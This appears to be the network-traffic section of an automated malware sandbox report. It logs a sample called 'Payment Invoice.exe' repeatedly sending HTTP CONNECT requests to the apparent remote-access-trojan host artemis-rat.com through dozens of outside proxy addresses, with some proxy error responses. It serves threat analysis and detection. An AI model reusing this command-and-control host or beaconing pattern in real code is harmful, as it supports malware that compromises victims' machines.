                                                                356192.168.2.45117866.225.246.23880807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.626435995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                357192.168.2.45115566.29.128.243105137076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.628295898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.256830931 CET24INHTTP/1.1 200 #string


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                358192.168.2.451157190.153.121.241457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.628642082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                359192.168.2.450194162.144.121.232247877076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.631803036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.823544979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.825088024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.823937893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:39.824274063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:51.823925972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:03.823625088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:27.917397976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:16.011140108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                360192.168.2.45111191.148.127.16280807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.640748024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                361192.168.2.451185198.23.229.203156737076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.675311089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                362192.168.2.450171184.181.217.19441457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.677216053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                363192.168.2.450168177.234.194.2269997076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.683207035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.776669025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.874193907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.886774063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:39.959316969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:41.082541943 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                364192.168.2.45084339.165.0.13790027076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.689490080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.376437902 CET311INHTTP/1.1 400 Bad Request
                                                                Server: nginx
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 166
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                365192.168.2.451137202.162.219.1010807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.700650930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                366192.168.2.45011651.75.126.150366947076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.701657057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.182903051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.886315107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.089413881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.386363983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.683367014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                367192.168.2.45014751.75.126.150341447076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.702297926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.167280912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.636048079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.620786905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.527291059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.511656046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.515055895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.214750051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                368192.168.2.450199174.75.211.22241457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.705529928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                369192.168.2.45119092.204.135.37229427076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.718358040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                370192.168.2.451146120.79.101.088887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.727590084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.098969936 CET767INHTTP/1.1 403 Forbidden
                                                                Server: Beaver
                                                                Cache-Control: no-cache
                                                                Content-Type: text/html
                                                                Content-Length: 635
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                371192.168.2.4511615.252.23.22010817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.736629963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                372192.168.2.45024424.249.199.441457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.736670017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                373192.168.2.450564192.252.214.20158647076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.738100052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                374192.168.2.451234104.21.85.200807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.746340036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.901171923 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                375192.168.2.45119472.210.221.19741457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.752511978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                376192.168.2.45119798.162.25.29316797076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.124470949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                377192.168.2.451175121.159.146.251807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.126141071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                378192.168.2.451186203.74.125.1888887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.127789021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                379192.168.2.45116795.66.138.2188807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.127904892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                380192.168.2.45022346.35.9.110807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.127958059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.423849106 CET340INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.12.2
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Content-Length: 173
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                381192.168.2.451207174.77.111.19741457076C:\Users\user\Desktop\Payment Invoice.exe
